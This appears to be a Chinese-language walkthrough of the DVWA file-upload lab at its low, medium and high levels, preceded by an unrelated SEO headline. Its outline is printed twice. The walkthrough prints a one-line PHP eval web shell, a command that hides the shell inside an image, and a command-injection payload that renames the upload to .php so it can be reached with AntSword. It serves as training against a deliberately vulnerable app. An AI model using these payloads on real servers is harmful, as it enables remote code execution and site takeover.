網(wǎng)站名和域名的區(qū)別seo推廣多少錢
目錄
?一、low級別,直接上傳木馬文件
1.1、準(zhǔn)備一個木馬文件
1.2、直接上傳木馬文件
1.3、訪問木馬鏈接
1.4、連接蟻劍
二、medium級別:抓包文件綴名
2.1、準(zhǔn)備一個木馬文件,修改后綴名為圖片的后綴名
2.2、上傳文件,打開burpSuite,抓上傳的包,修改后綴名為php,放行
2.3、訪問木馬文件鏈接
2.4、連接蟻劍
三、high級別:木馬圖片,命令執(zhí)行修改為木馬文件
3.1、準(zhǔn)備一個真實小圖片,命名自定義,以下是示例
3.2、準(zhǔn)備一個木馬文件
3.3、生成木馬圖片:cmd進(jìn)入圖片文件夾所在路徑,執(zhí)行生成木馬圖片命令
3.4、上傳文件?,成功后復(fù)制路徑
3.5、在Command Injection板塊命令執(zhí)行:修改木馬圖片為可行性木馬文件
?3.6、訪問修改后的,就是修改后的路徑:你的dvwa路徑拼接上這個文件路徑,回車就自動成功那個路徑
3.7、蟻劍連接:木馬鏈接和木馬密碼
?一、low級別,直接上傳木馬文件
1.1、準(zhǔn)備一個木馬文件
1.2、直接上傳木馬文件
1.3、訪問木馬鏈接
1.4、連接蟻劍
?
二、medium級別:抓包文件綴名
2.1、準(zhǔn)備一個木馬文件,修改后綴名為圖片的后綴名
2.2、上傳文件,打開burpSuite,抓上傳的包,修改后綴名為php,放行
?
2.3、訪問木馬文件鏈接
2.4、連接蟻劍
?
三、high級別:木馬圖片,命令執(zhí)行修改為木馬文件
3.1、準(zhǔn)備一個真實小圖片,命名自定義,以下是示例
3.2、準(zhǔn)備一個木馬文件
<?php @eval($_POST['pass']);?>
3.3、生成木馬圖片:cmd進(jìn)入圖片文件夾所在路徑,執(zhí)行生成木馬圖片命令
copy 真實圖片.后綴名/b+木馬文件.后綴名 木馬圖片.真實圖片后綴名
3.4、上傳文件?,成功后復(fù)制路徑
3.5、在Command Injection板塊命令執(zhí)行:修改木馬圖片為可行性木馬文件
127.0.0.1|move ../../hackable/uploads/你的木馬圖片 ../../hackable/uploads/修改后的木馬文件
?例如我的:127.0.0.1|move ../../hackable/uploads/mua.jpg ../../hackable/uploads/mua.php
3.6、訪問修改后的,就是修改后的路徑:你的dvwa路徑拼接上這個文件路徑,回車就自動成功那個路徑
http://127.0.0.1/dvwa/vulnerabilities/exec/../../hackable/uploads/mua.php直接回車,變成下方的木馬文件鏈接
http://127.0.0.1/dvwa/hackable/uploads/mua.php